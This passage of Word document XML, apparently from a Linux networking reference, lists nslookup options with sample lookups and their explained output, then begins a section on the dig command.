          </w:tcPr>
          <w:p w14:paraId="7DC82378" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set port number (default 53)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="18AD3127" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F24D3CE"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timeout=SECONDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32DE63F3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set timeout for queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="12D32839" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="474370C5"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etry=NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="014A19F9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set number of retries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="034D95D3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49BAC01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debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C6900BA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Enable debugging mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3E7E2957" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5279603F"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d2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156E2B41" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Enable exhaustive debugging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="39A01862" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0904C873"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odebug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="178A8F17" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Disable debugging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="69793E8B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DD435D4"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vc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6121D1C4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Always use virtual circuit (TCP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="20CF041F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B613B60"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ovc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C2FCCC3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Never use virtual circuit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="26C921D4" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40DDE45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ignoretc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B8DB799" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Ignore truncation errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="08579F83" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D23932B"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oignoretc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D1813C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't ignore truncation errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="694BC19A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248F075C"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fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E1A12B1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Try next server on SERVFAIL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="66FB709B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A4F1EB8"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ofail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685A304A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't try next server on SERVFAIL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5C541233" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="571BCF7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class=CLASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60F2C3F2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set query class (IN, CH, HS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1241EB0F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204B0EF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dots=NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A89C470" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set number of dots for absolute names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3C4925B0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05E3675C"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ecurse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0000DDC9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Tell server to do recursive query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="015E80DD" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D379738"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orecurse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38B13582" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Tell server not to do recursive query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21826073" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BADE2B" w14:textId="4949164B" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Basic domain lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9D40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slookup google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D78D04C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDBE66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erver:         127.0.0.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55242B5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Address:        127.0.0.53#53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A025C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05D6872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on-authoritative answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BDC0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ame:   google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04D1D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Address: 142.251.46.142</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF3AC2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ame:   google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122130AA"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Address: 2607:f8b0:4004:c1b::71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5495F8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A0504" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server: 127.0.0.53#53</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: DNS server used for query (systemd-resolved local cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516F2D97" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-authoritative answer</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Response from cache, not the authoritative DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134CA1B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name: google.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Domain name being resolved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A35E4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Address: 142.251.46.142</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: IPv4 address (A record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41323BA1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Address: 2607:f8b0:4004:c1b::71</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: IPv6 address (AAAA record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D045BB8" w14:textId="77777777" w:rsidR="005F3C78" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Load balancing across multiple servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7611CA" w14:textId="21F487A4" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Reverse DNS lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189534C6"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slookup 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1640DC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C302D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erver:         127.0.0.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51313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Address:        127.0.0.53#53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB25B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06439436"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on-authoritative answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999993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8.8.8.8.in-addr.arpa    name = dns.google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44976BEF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001475F6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.8.8.8.in-addr.arpa</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Reverse DNS format (PTR record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE1272" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name = dns.google.</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Hostname associated with IP 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D165C1B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Converting IP address back to hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD8643A" w14:textId="66474649" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Query specific DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189FEE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slookup google.com 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604CB3E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Testing different DNS servers or bypassing local DNS cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F5F5DF" w14:textId="13E7FA73" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Interactive mode for multiple queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E63884" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00CA7AF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slookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912E4E3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00CA7AF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t; set type=MX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3B680" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00CA7AF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t; google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD24C4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00CA7AF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t; set type=NS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D84BFF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00CA7AF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t; google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E8327A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00CA7AF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t; exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE55F0B" w14:textId="1487394D" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>dig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107BF1FB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command is a flexible DNS lookup tool that provides detailed DNS information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFEDA82" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511B380" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Perform DNS lookups and display detailed DNS response information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031FFC29" w14:textId="03A17DDE" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D196F6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dig [options] [name] [type] [class] [@server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2EF2D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1833"/>
        <w:gridCol w:w="6082"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="299E20EF" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E2E6365" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
